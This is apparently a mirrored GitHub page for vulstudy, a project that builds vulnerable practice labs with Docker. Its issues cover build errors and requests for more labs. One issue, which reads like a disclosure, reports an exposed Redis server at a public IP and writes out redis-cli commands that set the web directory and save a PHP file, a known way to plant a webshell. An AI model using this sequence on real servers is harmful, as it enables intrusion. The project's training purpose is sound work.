GithubHelp home page GithubHelp logo

c0ny1 / vulstudy Goto Github PK

View Code? Open in Web Editor NEW
2.2K 61.0 478.0 1.42 MB

使用docker快速搭建各大漏洞靶场,目前可以一键搭建17个靶场。

Shell 70.91% Dockerfile 29.09%
docker-image-builder vulnerability

vulstudy's People

Contributors

c0ny1 avatar lavon321 avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

vulstudy's Issues

运行 DSVW时出现错误

Step 22/30 : ADD build/default /etc/nginx/sites-available/default
ERROR: Service 'web' failed to build: ADD failed: file not found in build context or excluded by .dockerignore: stat build/default: file does not exist

Misconfigured redis server

Redis instance (1.14.157.192) is accepting anonymous connections at port 6379, you can start enumerating the service after connecting anonymously to :

  1. redis-cli -h 52.9.41.95

In both the cases you will have authenticated access to the server and you can enumerate anything in it. I am able to enumerate client list, check pidfile location, perform remote code execution, view real time logs on it.

RCE:
1.14.157.192:6379> config set dir /var/www/html
OK
1.14.157.192:6379> config set dbfilename redis.php
OK
(1.50s)
1.14.157.192:6379> set test ""
OK
(1.30s)
1.14.157.192:6379> save
(error) ERR
(0.52s)
1.14.157.192:6379> bgsave
Background saving started
(1.20s)
1.14.157.192:6379>

Client list exposes the internal servers but I can only see my IP in it right now maybe you guys don't connect on this a lot but still secure it by restricting the port to only tcp and put noauth if udp is required.

靶场/漏洞学习平台增加~

大佬怎么不把你项目里的 文件上传 和 XXE 的两个靶场一起做进去,这样岂不是更完美,另外不知大佬有没有听说一个叫XSS挑战之旅的 xss靶场,我觉得也很不错,大佬可以一起做进去,如果没有资源的话,我这边可以发你~

add

补充一些BWVS、DoraBox、Wooyun_DVWA、 ZVulDrill、 XVWA 、OWASP Security Shepherd、WebGoat、WAVSEP、各类xss挑战

WebGoat启动命令中建议增加环境变量WEBWOLF_HOST和WEBWOLF_PORT

创建WebWolf容器时如果不是使用的的默认ip和端口 http://localhost:8081
在WebGoat Admin password reset 这一关填写邮件地址后会导致无法发送邮件给WebWolf
例如: http://10.1.1.111:8080/WebGoat/start.mvc#lesson/Challenge7.lesson
图片


分析返回值发现webwolf的mail配置用的是默认配置
图片


代码逻辑对应 webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/challenge7/Assignment7.java
图片


配置文件对应 webgoat-container/src/main/resources/application-webgoat.properties
图片

建议在WebGoat对应的docker-compose.yml 启动命令或启动脚本中增加环境变量WEBWOLF_HOSTWEBWOLF_PORT 来指定非默认环境情况下WebWolf的ip和端口

pip

我想知道用的是2还是3,因为我同时安装了2和3,但默认是3,正常的都默认安装2,这会有影响吗

运行vulnerable-node出错

查看原因好像是因为新版数据库docker必须配置用户名和密码,这个该在哪里配置呀,怎么更改数据库postgres_db的用户名和密码呀

SQL-labs 出现bug

image
如图所示,在一次docker-compose up -d 后,会出现不能连接数据库的错误。提示信息为:[*]...................Could not connect to DB, check the creds in db-creds.inc: Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2)

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.